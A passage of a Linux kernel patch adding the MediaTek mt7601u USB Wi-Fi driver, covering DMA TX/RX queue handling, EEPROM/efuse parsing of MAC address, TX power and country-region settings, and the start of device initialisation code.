+ q->used--; + + if (urb->status) + goto out; + + set_bit(MT7601U_STATE_MORE_STATS, &dev->state); + if (!test_and_set_bit(MT7601U_STATE_READING_STATS, &dev->state)) + queue_delayed_work(dev->stat_wq, &dev->stat_work, + msecs_to_jiffies(10)); +out: + spin_unlock_irqrestore(&dev->tx_lock, flags); +} + +static int mt7601u_dma_submit_tx(struct mt7601u_dev *dev, + struct sk_buff *skb, u8 ep) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + unsigned snd_pipe = usb_sndbulkpipe(usb_dev, dev->out_eps[ep]); + struct mt7601u_dma_buf_tx *e; + struct mt7601u_tx_queue *q = &dev->tx_q[ep]; + unsigned long flags; + int ret; + + spin_lock_irqsave(&dev->tx_lock, flags); + + if (WARN_ON(q->entries <= q->used)) { + ret = -ENOSPC; + goto out; + } + + e = &q->e[q->end]; + e->skb = skb; + usb_fill_bulk_urb(e->urb, usb_dev, snd_pipe, skb->data, skb->len, + mt7601u_complete_tx, q); + ret = usb_submit_urb(e->urb, GFP_ATOMIC); + if (ret) { + /* Special-handle ENODEV from TX urb submission because it will + * often be the first ENODEV we see after device is removed. 
+ */ + if (ret == -ENODEV) + set_bit(MT7601U_STATE_REMOVED, &dev->state); + else + dev_err(dev->dev, "Error: TX urb submit failed:%d\n", + ret); + goto out; + } + + q->end = (q->end + 1) % q->entries; + q->used++; + + if (q->used >= q->entries) + ieee80211_stop_queue(dev->hw, skb_get_queue_mapping(skb)); +out: + spin_unlock_irqrestore(&dev->tx_lock, flags); + + return ret; +} + +/* Map hardware Q to USB endpoint number */ +static u8 q2ep(u8 qid) +{ + /* TODO: take management packets to queue 5 */ + return qid + 1; +} + +/* Map USB endpoint number to Q id in the DMA engine */ +static enum mt76_qsel ep2dmaq(u8 ep) +{ + if (ep == 5) + return MT_QSEL_MGMT; + return MT_QSEL_EDCA; +} + +int mt7601u_dma_enqueue_tx(struct mt7601u_dev *dev, struct sk_buff *skb, + struct mt76_wcid *wcid, int hw_q) +{ + u8 ep = q2ep(hw_q); + u32 dma_flags; + int ret; + + dma_flags = MT_TXD_PKT_INFO_80211; + if (wcid->hw_key_idx == 0xff) + dma_flags |= MT_TXD_PKT_INFO_WIV; + + ret = mt7601u_dma_skb_wrap_pkt(skb, ep2dmaq(ep), dma_flags); + if (ret) + return ret; + + ret = mt7601u_dma_submit_tx(dev, skb, ep); + if (ret) { + ieee80211_free_txskb(dev->hw, skb); + return ret; + } + + return 0; +} + +static void mt7601u_kill_rx(struct mt7601u_dev *dev) +{ + int i; + unsigned long flags; + + spin_lock_irqsave(&dev->rx_lock, flags); + + for (i = 0; i < dev->rx_q.entries; i++) { + int next = dev->rx_q.end; + + spin_unlock_irqrestore(&dev->rx_lock, flags); + usb_poison_urb(dev->rx_q.e[next].urb); + spin_lock_irqsave(&dev->rx_lock, flags); + } + + spin_unlock_irqrestore(&dev->rx_lock, flags); +} + +static int mt7601u_submit_rx_buf(struct mt7601u_dev *dev, + struct mt7601u_dma_buf_rx *e, gfp_t gfp) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + u8 *buf = page_address(e->p); + unsigned pipe; + int ret; + + pipe = usb_rcvbulkpipe(usb_dev, dev->in_eps[MT_EP_IN_PKT_RX]); + + usb_fill_bulk_urb(e->urb, usb_dev, pipe, buf, MT_RX_URB_SIZE, + mt7601u_complete_rx, dev); + + trace_mt_submit_urb(dev, e->urb); + ret = usb_submit_urb(e->urb, gfp); + if (ret) + dev_err(dev->dev, "Error: submit RX URB failed:%d\n", ret); + + return ret; +} + +static int mt7601u_submit_rx(struct mt7601u_dev *dev) +{ + int i, ret; + + for (i = 0; i < dev->rx_q.entries; i++) { + ret = mt7601u_submit_rx_buf(dev, &dev->rx_q.e[i], GFP_KERNEL); + if (ret) + return ret; + } + + return 0; +} + +static void mt7601u_free_rx(struct mt7601u_dev *dev) +{ + int i; + + for (i = 0; i < dev->rx_q.entries; i++) { + __free_pages(dev->rx_q.e[i].p, MT_RX_ORDER); + usb_free_urb(dev->rx_q.e[i].urb); + } +} + +static int mt7601u_alloc_rx(struct mt7601u_dev *dev) +{ + int i; + + memset(&dev->rx_q, 0, sizeof(dev->rx_q)); + dev->rx_q.dev = dev; + dev->rx_q.entries = N_RX_ENTRIES; + + for (i = 0; i < N_RX_ENTRIES; i++) { + dev->rx_q.e[i].urb = usb_alloc_urb(0, GFP_KERNEL); + dev->rx_q.e[i].p = dev_alloc_pages(MT_RX_ORDER); + + if (!dev->rx_q.e[i].urb || !dev->rx_q.e[i].p) + return -ENOMEM; + } + + return 0; +} + +static void mt7601u_free_tx_queue(struct mt7601u_tx_queue *q) +{ + int i; + + WARN_ON(q->used); + + for (i = 0; i < q->entries; i++) { + usb_poison_urb(q->e[i].urb); + usb_free_urb(q->e[i].urb); + } +} + +static void mt7601u_free_tx(struct mt7601u_dev *dev) +{ + int i; + + for (i = 0; i < __MT_EP_OUT_MAX; i++) + mt7601u_free_tx_queue(&dev->tx_q[i]); +} + +static int mt7601u_alloc_tx_queue(struct mt7601u_dev *dev, + struct mt7601u_tx_queue *q) +{ + int i; + + q->dev = dev; + q->entries = N_TX_ENTRIES; + + for (i = 0; i < N_TX_ENTRIES; i++) { + q->e[i].urb = 
usb_alloc_urb(0, GFP_KERNEL); + if (!q->e[i].urb) + return -ENOMEM; + } + + return 0; +} + +static int mt7601u_alloc_tx(struct mt7601u_dev *dev) +{ + int i; + + dev->tx_q = devm_kcalloc(dev->dev, __MT_EP_OUT_MAX, + sizeof(*dev->tx_q), GFP_KERNEL); + + for (i = 0; i < __MT_EP_OUT_MAX; i++) + if (mt7601u_alloc_tx_queue(dev, &dev->tx_q[i])) + return -ENOMEM; + + return 0; +} + +int mt7601u_dma_init(struct mt7601u_dev *dev) +{ + int ret = -ENOMEM; + + tasklet_init(&dev->rx_tasklet, mt7601u_rx_tasklet, (unsigned long) dev); + + ret = mt7601u_alloc_tx(dev); + if (ret) + goto err; + ret = mt7601u_alloc_rx(dev); + if (ret) + goto err; + + ret = mt7601u_submit_rx(dev); + if (ret) + goto err; + + return 0; +err: + mt7601u_dma_cleanup(dev); + return ret; +} + +void mt7601u_dma_cleanup(struct mt7601u_dev *dev) +{ + mt7601u_kill_rx(dev); + + tasklet_kill(&dev->rx_tasklet); + + mt7601u_free_rx(dev); + mt7601u_free_tx(dev); +} diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.h b/drivers/net/wireless/mediatek/mt7601u/dma.h new file mode 100644 index 000000000000..978e8a90b87f --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/dma.h @@ -0,0 +1,127 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_DMA_H +#define __MT7601U_DMA_H + +#include +#include + +#include "util.h" + +#define MT_DMA_HDR_LEN 4 +#define MT_RX_INFO_LEN 4 +#define MT_FCE_INFO_LEN 4 +#define MT_DMA_HDRS (MT_DMA_HDR_LEN + MT_RX_INFO_LEN) + +/* Common Tx DMA descriptor fields */ +#define MT_TXD_INFO_LEN GENMASK(15, 0) +#define MT_TXD_INFO_D_PORT GENMASK(29, 27) +#define MT_TXD_INFO_TYPE GENMASK(31, 30) + +enum mt76_msg_port { + WLAN_PORT, + CPU_RX_PORT, + CPU_TX_PORT, + HOST_PORT, + VIRTUAL_CPU_RX_PORT, + VIRTUAL_CPU_TX_PORT, + DISCARD, +}; + +enum mt76_info_type { + DMA_PACKET, + DMA_COMMAND, +}; + +/* Tx DMA packet specific flags */ +#define MT_TXD_PKT_INFO_NEXT_VLD BIT(16) +#define MT_TXD_PKT_INFO_TX_BURST BIT(17) +#define MT_TXD_PKT_INFO_80211 BIT(19) +#define MT_TXD_PKT_INFO_TSO BIT(20) +#define MT_TXD_PKT_INFO_CSO BIT(21) +#define MT_TXD_PKT_INFO_WIV BIT(24) +#define MT_TXD_PKT_INFO_QSEL GENMASK(26, 25) + +enum mt76_qsel { + MT_QSEL_MGMT, + MT_QSEL_HCCA, + MT_QSEL_EDCA, + MT_QSEL_EDCA_2, +}; + +/* Tx DMA MCU command specific flags */ +#define MT_TXD_CMD_INFO_SEQ GENMASK(19, 16) +#define MT_TXD_CMD_INFO_TYPE GENMASK(26, 20) + +static inline int mt7601u_dma_skb_wrap(struct sk_buff *skb, + enum mt76_msg_port d_port, + enum mt76_info_type type, u32 flags) +{ + u32 info; + + /* Buffer layout: + * | 4B | xfer len | pad | 4B | + * | TXINFO | pkt/cmd | zero pad to 4B | zero | + * + * length field of TXINFO should be set to 'xfer len'. 
+ */ + + info = flags | + MT76_SET(MT_TXD_INFO_LEN, round_up(skb->len, 4)) | + MT76_SET(MT_TXD_INFO_D_PORT, d_port) | + MT76_SET(MT_TXD_INFO_TYPE, type); + + put_unaligned_le32(info, skb_push(skb, sizeof(info))); + return skb_put_padto(skb, round_up(skb->len, 4) + 4); +} + +static inline int +mt7601u_dma_skb_wrap_pkt(struct sk_buff *skb, enum mt76_qsel qsel, u32 flags) +{ + flags |= MT76_SET(MT_TXD_PKT_INFO_QSEL, qsel); + return mt7601u_dma_skb_wrap(skb, WLAN_PORT, DMA_PACKET, flags); +} + +/* Common Rx DMA descriptor fields */ +#define MT_RXD_INFO_LEN GENMASK(13, 0) +#define MT_RXD_INFO_PCIE_INTR BIT(24) +#define MT_RXD_INFO_QSEL GENMASK(26, 25) +#define MT_RXD_INFO_PORT GENMASK(29, 27) +#define MT_RXD_INFO_TYPE GENMASK(31, 30) + +/* Rx DMA packet specific flags */ +#define MT_RXD_PKT_INFO_UDP_ERR BIT(16) +#define MT_RXD_PKT_INFO_TCP_ERR BIT(17) +#define MT_RXD_PKT_INFO_IP_ERR BIT(18) +#define MT_RXD_PKT_INFO_PKT_80211 BIT(19) +#define MT_RXD_PKT_INFO_L3L4_DONE BIT(20) +#define MT_RXD_PKT_INFO_MAC_LEN GENMASK(23, 21) + +/* Rx DMA MCU command specific flags */ +#define MT_RXD_CMD_INFO_SELF_GEN BIT(15) +#define MT_RXD_CMD_INFO_CMD_SEQ GENMASK(19, 16) +#define MT_RXD_CMD_INFO_EVT_TYPE GENMASK(23, 20) + +enum mt76_evt_type { + CMD_DONE, + CMD_ERROR, + CMD_RETRY, + EVENT_PWR_RSP, + EVENT_WOW_RSP, + EVENT_CARRIER_DETECT_RSP, + EVENT_DFS_DETECT_RSP, +}; + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/eeprom.c b/drivers/net/wireless/mediatek/mt7601u/eeprom.c new file mode 100644 index 000000000000..ce3837f270f0 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/eeprom.c @@ -0,0 +1,414 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include +#include +#include +#include +#include +#include "mt7601u.h" +#include "eeprom.h" + +static bool +field_valid(u8 val) +{ + return val != 0xff; +} + +static s8 +field_validate(u8 val) +{ + if (!field_valid(val)) + return 0; + + return val; +} + +static int +mt7601u_efuse_read(struct mt7601u_dev *dev, u16 addr, u8 *data, + enum mt7601u_eeprom_access_modes mode) +{ + u32 val; + int i; + + val = mt76_rr(dev, MT_EFUSE_CTRL); + val &= ~(MT_EFUSE_CTRL_AIN | + MT_EFUSE_CTRL_MODE); + val |= MT76_SET(MT_EFUSE_CTRL_AIN, addr & ~0xf) | + MT76_SET(MT_EFUSE_CTRL_MODE, mode) | + MT_EFUSE_CTRL_KICK; + mt76_wr(dev, MT_EFUSE_CTRL, val); + + if (!mt76_poll(dev, MT_EFUSE_CTRL, MT_EFUSE_CTRL_KICK, 0, 1000)) + return -ETIMEDOUT; + + val = mt76_rr(dev, MT_EFUSE_CTRL); + if ((val & MT_EFUSE_CTRL_AOUT) == MT_EFUSE_CTRL_AOUT) { + /* Parts of eeprom not in the usage map (0x80-0xc0,0xf0) + * will not return valid data but it's ok. 
+ */ + memset(data, 0xff, 16); + return 0; + } + + for (i = 0; i < 4; i++) { + val = mt76_rr(dev, MT_EFUSE_DATA(i)); + put_unaligned_le32(val, data + 4 * i); + } + + return 0; +} + +static int +mt7601u_efuse_physical_size_check(struct mt7601u_dev *dev) +{ + const int map_reads = DIV_ROUND_UP(MT_EFUSE_USAGE_MAP_SIZE, 16); + u8 data[map_reads * 16]; + int ret, i; + u32 start = 0, end = 0, cnt_free; + + for (i = 0; i < map_reads; i++) { + ret = mt7601u_efuse_read(dev, MT_EE_USAGE_MAP_START + i * 16, + data + i * 16, MT_EE_PHYSICAL_READ); + if (ret) + return ret; + } + + for (i = 0; i < MT_EFUSE_USAGE_MAP_SIZE; i++) + if (!data[i]) { + if (!start) + start = MT_EE_USAGE_MAP_START + i; + end = MT_EE_USAGE_MAP_START + i; + } + cnt_free = end - start + 1; + + if (MT_EFUSE_USAGE_MAP_SIZE - cnt_free < 5) { + dev_err(dev->dev, "Error: your device needs default EEPROM file and this driver doesn't support it!\n"); + return -EINVAL; + } + + return 0; +} + +static bool +mt7601u_has_tssi(struct mt7601u_dev *dev, u8 *eeprom) +{ + u16 nic_conf1 = get_unaligned_le16(eeprom + MT_EE_NIC_CONF_1); + + return ~nic_conf1 && (nic_conf1 & MT_EE_NIC_CONF_1_TX_ALC_EN); +} + +static void +mt7601u_set_chip_cap(struct mt7601u_dev *dev, u8 *eeprom) +{ + u16 nic_conf0 = get_unaligned_le16(eeprom + MT_EE_NIC_CONF_0); + u16 nic_conf1 = get_unaligned_le16(eeprom + MT_EE_NIC_CONF_1); + + if (!field_valid(nic_conf1 & 0xff)) + nic_conf1 &= 0xff00; + + dev->ee->tssi_enabled = mt7601u_has_tssi(dev, eeprom) && + !(nic_conf1 & MT_EE_NIC_CONF_1_TEMP_TX_ALC); + + if (nic_conf1 & MT_EE_NIC_CONF_1_HW_RF_CTRL) + dev_err(dev->dev, + "Error: this driver does not support HW RF ctrl\n"); + + if (!field_valid(nic_conf0 >> 8)) + return; + + if (MT76_GET(MT_EE_NIC_CONF_0_RX_PATH, nic_conf0) > 1 || + MT76_GET(MT_EE_NIC_CONF_0_TX_PATH, nic_conf0) > 1) + dev_err(dev->dev, + "Error: device has more than 1 RX/TX stream!\n"); +} + +static int +mt7601u_set_macaddr(struct mt7601u_dev *dev, const u8 *eeprom) +{ + const void *src = eeprom + MT_EE_MAC_ADDR; + + ether_addr_copy(dev->macaddr, src); + + if (!is_valid_ether_addr(dev->macaddr)) { + eth_random_addr(dev->macaddr); + dev_info(dev->dev, + "Invalid MAC address, using random address %pM\n", + dev->macaddr); + } + + mt76_wr(dev, MT_MAC_ADDR_DW0, get_unaligned_le32(dev->macaddr)); + mt76_wr(dev, MT_MAC_ADDR_DW1, get_unaligned_le16(dev->macaddr + 4) | + MT76_SET(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff)); + + return 0; +} + +static void mt7601u_set_channel_target_power(struct mt7601u_dev *dev, + u8 *eeprom, u8 max_pwr) +{ + u8 trgt_pwr = eeprom[MT_EE_TX_TSSI_TARGET_POWER]; + + if (trgt_pwr > max_pwr || !trgt_pwr) { + dev_warn(dev->dev, "Error: EEPROM trgt power invalid %hhx!\n", + trgt_pwr); + trgt_pwr = 0x20; + } + + memset(dev->ee->chan_pwr, trgt_pwr, sizeof(dev->ee->chan_pwr)); +} + +static void +mt7601u_set_channel_power(struct mt7601u_dev *dev, u8 *eeprom) +{ + u32 i, val; + u8 max_pwr; + + val = mt7601u_rr(dev, MT_TX_ALC_CFG_0); + max_pwr = MT76_GET(MT_TX_ALC_CFG_0_LIMIT_0, val); + + if (mt7601u_has_tssi(dev, eeprom)) { + mt7601u_set_channel_target_power(dev, eeprom, max_pwr); + return; + } + + for (i = 0; i < 14; i++) { + s8 power = field_validate(eeprom[MT_EE_TX_POWER_OFFSET + i]); + + if (power > max_pwr || power < 0) + power = MT7601U_DEFAULT_TX_POWER; + + dev->ee->chan_pwr[i] = power; + } +} + +static void +mt7601u_set_country_reg(struct mt7601u_dev *dev, u8 *eeprom) +{ + /* Note: - region 31 is not valid for mt7601u (see rtmp_init.c) + * - comments in rtmp_def.h are incorrect (see rt_channel.c) + */ 
+ static const struct reg_channel_bounds chan_bounds[] = { + /* EEPROM country regions 0 - 7 */ + { 1, 11 }, { 1, 13 }, { 10, 2 }, { 10, 4 }, + { 14, 1 }, { 1, 14 }, { 3, 7 }, { 5, 9 }, + /* EEPROM country regions 32 - 33 */ + { 1, 11 }, { 1, 14 } + }; + u8 val = eeprom[MT_EE_COUNTRY_REGION]; + int idx = -1; + + if (val < 8) + idx = val; + if (val > 31 && val < 33) + idx = val - 32 + 8; + + if (idx != -1) + dev_info(dev->dev, + "EEPROM country region %02hhx (channels %hhd-%hhd)\n", + val, chan_bounds[idx].start, + chan_bounds[idx].start + chan_bounds[idx].num - 1); + else + idx = 5; /* channels 1 - 14 */ + + dev->ee->reg = chan_bounds[idx]; + + /* TODO: country region 33 is special - phy should be set to B-mode + * before entering channel 14 (see sta/connect.c) + */ +} + +static void +mt7601u_set_rf_freq_off(struct mt7601u_dev *dev, u8 *eeprom) +{ + u8 comp; + + dev->ee->rf_freq_off = field_validate(eeprom[MT_EE_FREQ_OFFSET]); + comp = field_validate(eeprom[MT_EE_FREQ_OFFSET_COMPENSATION]); + + if (comp & BIT(7)) + dev->ee->rf_freq_off -= comp & 0x7f; + else + dev->ee->rf_freq_off += comp; +} + +static void +mt7601u_set_rssi_offset(struct mt7601u_dev *dev, u8 *eeprom) +{ + int i; + s8 *rssi_offset = dev->ee->rssi_offset; + + for (i = 0; i < 2; i++) { + rssi_offset[i] = eeprom[MT_EE_RSSI_OFFSET + i]; + + if (rssi_offset[i] < -10 || rssi_offset[i] > 10) { + dev_warn(dev->dev, + "Warning: EEPROM RSSI is invalid %02hhx\n", + rssi_offset[i]); + rssi_offset[i] = 0; + } + } +} + +static void +mt7601u_extra_power_over_mac(struct mt7601u_dev *dev) +{ + u32 val; + + val = ((mt7601u_rr(dev, MT_TX_PWR_CFG_1) & 0x0000ff00) >> 8); + val |= ((mt7601u_rr(dev, MT_TX_PWR_CFG_2) & 0x0000ff00) << 8); + mt7601u_wr(dev, MT_TX_PWR_CFG_7, val); + + val = ((mt7601u_rr(dev, MT_TX_PWR_CFG_4) & 0x0000ff00) >> 8); + mt7601u_wr(dev, MT_TX_PWR_CFG_9, val); +} + +static void +mt7601u_set_power_rate(struct power_per_rate *rate, s8 delta, u8 value) +{ + rate->raw = s6_validate(value); + rate->bw20 = s6_to_int(value); + /* Note: vendor driver does cap the value to s6 right away */ + rate->bw40 = rate->bw20 + delta; +} + +static void +mt7601u_save_power_rate(struct mt7601u_dev *dev, s8 delta, u32 val, int i) +{ + struct mt7601u_rate_power *t = &dev->ee->power_rate_table; + + switch (i) { + case 0: + mt7601u_set_power_rate(&t->cck[0], delta, (val >> 0) & 0xff); + mt7601u_set_power_rate(&t->cck[1], delta, (val >> 8) & 0xff); + /* Save cck bw20 for fixups of channel 14 */ + dev->ee->real_cck_bw20[0] = t->cck[0].bw20; + dev->ee->real_cck_bw20[1] = t->cck[1].bw20; + + mt7601u_set_power_rate(&t->ofdm[0], delta, (val >> 16) & 0xff); + mt7601u_set_power_rate(&t->ofdm[1], delta, (val >> 24) & 0xff); + break; + case 1: + mt7601u_set_power_rate(&t->ofdm[2], delta, (val >> 0) & 0xff); + mt7601u_set_power_rate(&t->ofdm[3], delta, (val >> 8) & 0xff); + mt7601u_set_power_rate(&t->ht[0], delta, (val >> 16) & 0xff); + mt7601u_set_power_rate(&t->ht[1], delta, (val >> 24) & 0xff); + break; + case 2: + mt7601u_set_power_rate(&t->ht[2], delta, (val >> 0) & 0xff); + mt7601u_set_power_rate(&t->ht[3], delta, (val >> 8) & 0xff); + break; + } +} + +static s8 +get_delta(u8 val) +{ + s8 ret; + + if (!field_valid(val) || !(val & BIT(7))) + return 0; + + ret = val & 0x1f; + if (ret > 8) + ret = 8; + if (val & BIT(6)) + ret = -ret; + + return ret; +} + +static void +mt7601u_config_tx_power_per_rate(struct mt7601u_dev *dev, u8 *eeprom) +{ + u32 val; + s8 bw40_delta; + int i; + + bw40_delta = get_delta(eeprom[MT_EE_TX_POWER_DELTA_BW40]); + + for (i = 0; i < 
5; i++) { + val = get_unaligned_le32(eeprom + MT_EE_TX_POWER_BYRATE(i)); + + mt7601u_save_power_rate(dev, bw40_delta, val, i); + + if (~val) + mt7601u_wr(dev, MT_TX_PWR_CFG_0 + i * 4, val); + } + + mt7601u_extra_power_over_mac(dev); +} + +static void +mt7601u_init_tssi_params(struct mt7601u_dev *dev, u8 *eeprom) +{ + struct tssi_data *d = &dev->ee->tssi_data; + + if (!dev->ee->tssi_enabled) + return; + + d->slope = eeprom[MT_EE_TX_TSSI_SLOPE]; + d->tx0_delta_offset = eeprom[MT_EE_TX_TSSI_OFFSET] * 1024; + d->offset[0] = eeprom[MT_EE_TX_TSSI_OFFSET_GROUP]; + d->offset[1] = eeprom[MT_EE_TX_TSSI_OFFSET_GROUP + 1]; + d->offset[2] = eeprom[MT_EE_TX_TSSI_OFFSET_GROUP + 2]; +} + +int +mt7601u_eeprom_init(struct mt7601u_dev *dev) +{ + u8 *eeprom; + int i, ret; + + ret = mt7601u_efuse_physical_size_check(dev); + if (ret) + return ret; + + dev->ee = devm_kzalloc(dev->dev, sizeof(*dev->ee), GFP_KERNEL); + if (!dev->ee) + return -ENOMEM; + + eeprom = kmalloc(MT7601U_EEPROM_SIZE, GFP_KERNEL); + if (!eeprom) + return -ENOMEM; + + for (i = 0; i + 16 <= MT7601U_EEPROM_SIZE; i += 16) { + ret = mt7601u_efuse_read(dev, i, eeprom + i, MT_EE_READ); + if (ret) + goto out; + } + + if (eeprom[MT_EE_VERSION_EE] > MT7601U_EE_MAX_VER) + dev_warn(dev->dev, + "Warning: unsupported EEPROM version %02hhx\n", + eeprom[MT_EE_VERSION_EE]); + dev_info(dev->dev, "EEPROM ver:%02hhx fae:%02hhx\n", + eeprom[MT_EE_VERSION_EE], eeprom[MT_EE_VERSION_FAE]); + + mt7601u_set_macaddr(dev, eeprom); + mt7601u_set_chip_cap(dev, eeprom); + mt7601u_set_channel_power(dev, eeprom); + mt7601u_set_country_reg(dev, eeprom); + mt7601u_set_rf_freq_off(dev, eeprom); + mt7601u_set_rssi_offset(dev, eeprom); + dev->ee->ref_temp = eeprom[MT_EE_REF_TEMP]; + dev->ee->lna_gain = eeprom[MT_EE_LNA_GAIN]; + + mt7601u_config_tx_power_per_rate(dev, eeprom); + + mt7601u_init_tssi_params(dev, eeprom); +out: + kfree(eeprom); + return ret; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/eeprom.h b/drivers/net/wireless/mediatek/mt7601u/eeprom.h new file mode 100644 index 000000000000..662d12703b69 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/eeprom.h @@ -0,0 +1,151 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#ifndef __MT7601U_EEPROM_H +#define __MT7601U_EEPROM_H + +struct mt7601u_dev; + +#define MT7601U_EE_MAX_VER 0x0c +#define MT7601U_EEPROM_SIZE 256 + +#define MT7601U_DEFAULT_TX_POWER 6 + +enum mt76_eeprom_field { + MT_EE_CHIP_ID = 0x00, + MT_EE_VERSION_FAE = 0x02, + MT_EE_VERSION_EE = 0x03, + MT_EE_MAC_ADDR = 0x04, + MT_EE_NIC_CONF_0 = 0x34, + MT_EE_NIC_CONF_1 = 0x36, + MT_EE_COUNTRY_REGION = 0x39, + MT_EE_FREQ_OFFSET = 0x3a, + MT_EE_NIC_CONF_2 = 0x42, + + MT_EE_LNA_GAIN = 0x44, + MT_EE_RSSI_OFFSET = 0x46, + + MT_EE_TX_POWER_DELTA_BW40 = 0x50, + MT_EE_TX_POWER_OFFSET = 0x52, + + MT_EE_TX_TSSI_SLOPE = 0x6e, + MT_EE_TX_TSSI_OFFSET_GROUP = 0x6f, + MT_EE_TX_TSSI_OFFSET = 0x76, + + MT_EE_TX_TSSI_TARGET_POWER = 0xd0, + MT_EE_REF_TEMP = 0xd1, + MT_EE_FREQ_OFFSET_COMPENSATION = 0xdb, + MT_EE_TX_POWER_BYRATE_BASE = 0xde, + + MT_EE_USAGE_MAP_START = 0x1e0, + MT_EE_USAGE_MAP_END = 0x1fc, +}; + +#define MT_EE_NIC_CONF_0_RX_PATH GENMASK(3, 0) +#define MT_EE_NIC_CONF_0_TX_PATH GENMASK(7, 4) +#define MT_EE_NIC_CONF_0_BOARD_TYPE GENMASK(13, 12) + +#define MT_EE_NIC_CONF_1_HW_RF_CTRL BIT(0) +#define MT_EE_NIC_CONF_1_TEMP_TX_ALC BIT(1) +#define MT_EE_NIC_CONF_1_LNA_EXT_2G BIT(2) +#define MT_EE_NIC_CONF_1_LNA_EXT_5G BIT(3) +#define MT_EE_NIC_CONF_1_TX_ALC_EN BIT(13) + +#define MT_EE_NIC_CONF_2_RX_STREAM GENMASK(3, 0) +#define MT_EE_NIC_CONF_2_TX_STREAM GENMASK(7, 4) +#define MT_EE_NIC_CONF_2_HW_ANTDIV BIT(8) +#define MT_EE_NIC_CONF_2_XTAL_OPTION GENMASK(10, 9) +#define MT_EE_NIC_CONF_2_TEMP_DISABLE BIT(11) +#define MT_EE_NIC_CONF_2_COEX_METHOD GENMASK(15, 13) + +#define MT_EE_TX_POWER_BYRATE(i) (MT_EE_TX_POWER_BYRATE_BASE + \ + (i) * 4) + +#define MT_EFUSE_USAGE_MAP_SIZE (MT_EE_USAGE_MAP_END - \ + MT_EE_USAGE_MAP_START + 1) + +enum mt7601u_eeprom_access_modes { + MT_EE_READ = 0, + MT_EE_PHYSICAL_READ = 1, +}; + +struct power_per_rate { + u8 raw; /* validated s6 value */ + s8 bw20; /* sign-extended int */ + s8 bw40; /* sign-extended int */ +}; + +/* Power per rate - one value per two rates */ +struct mt7601u_rate_power { + struct power_per_rate cck[2]; + struct power_per_rate ofdm[4]; + struct power_per_rate ht[4]; +}; + +struct reg_channel_bounds { + u8 start; + u8 num; +}; + +struct mt7601u_eeprom_params { + bool tssi_enabled; + u8 rf_freq_off; + s8 rssi_offset[2]; + s8 ref_temp; + s8 lna_gain; + + u8 chan_pwr[14]; + struct mt7601u_rate_power power_rate_table; + s8 real_cck_bw20[2]; + + /* TSSI stuff - only with internal TX ALC */ + struct tssi_data { + int tx0_delta_offset; + u8 slope; + u8 offset[3]; + } tssi_data; + + struct reg_channel_bounds reg; +}; + +int mt7601u_eeprom_init(struct mt7601u_dev *dev); + +static inline u32 s6_validate(u32 reg) +{ + WARN_ON(reg & ~GENMASK(5, 0)); + return reg & GENMASK(5, 0); +} + +static inline int s6_to_int(u32 reg) +{ + int s6; + + s6 = s6_validate(reg); + if (s6 & BIT(5)) + s6 -= BIT(6); + + return s6; +} + +static inline u32 int_to_s6(int val) +{ + if (val < -0x20) + return 0x20; + if (val > 0x1f) + return 0x1f; + + return val & 0x3f; +} + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/init.c b/drivers/net/wireless/mediatek/mt7601u/init.c new file mode 100644 index 000000000000..1fc86e865c8c --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/init.c @@ -0,0 +1,625 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. 
+ * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "eeprom.h" +#include "trace.h" +#include "mcu.h" + +#include "initvals.h" + +static void +mt7601u_set_wlan_state(struct mt7601u_dev *dev, u32 val, bool enable) +{ + int i; + + /* Note: we don't turn off WLAN_CLK because that makes the device + * not respond properly on the probe path. + * In case anyone (PSM?) wants to use this function we can + * bring the clock stuff back and fixup the probe path. + */ + + if (enable) + val |= (MT_WLAN_FUN_CTRL_WLAN_EN | + MT_WLAN_FUN_CTRL_WLAN_CLK_EN); + else + val &= ~(MT_WLAN_FUN_CTRL_WLAN_EN); + + mt7601u_wr(dev, MT_WLAN_FUN_CTRL, val); + udelay(20); + + if (enable) { + set_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state); + } else { + clear_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state); + return; + } + + for (i = 200; i; i--) { + val = mt7601u_rr(dev, MT_CMB_CTRL); + + if (val & MT_CMB_CTRL_XTAL_RDY && val & MT_CMB_CTRL_PLL_LD) + break; + + udelay(20); + } + + /* Note: vendor driver tries to disable/enable wlan here and retry + * but the code which does it 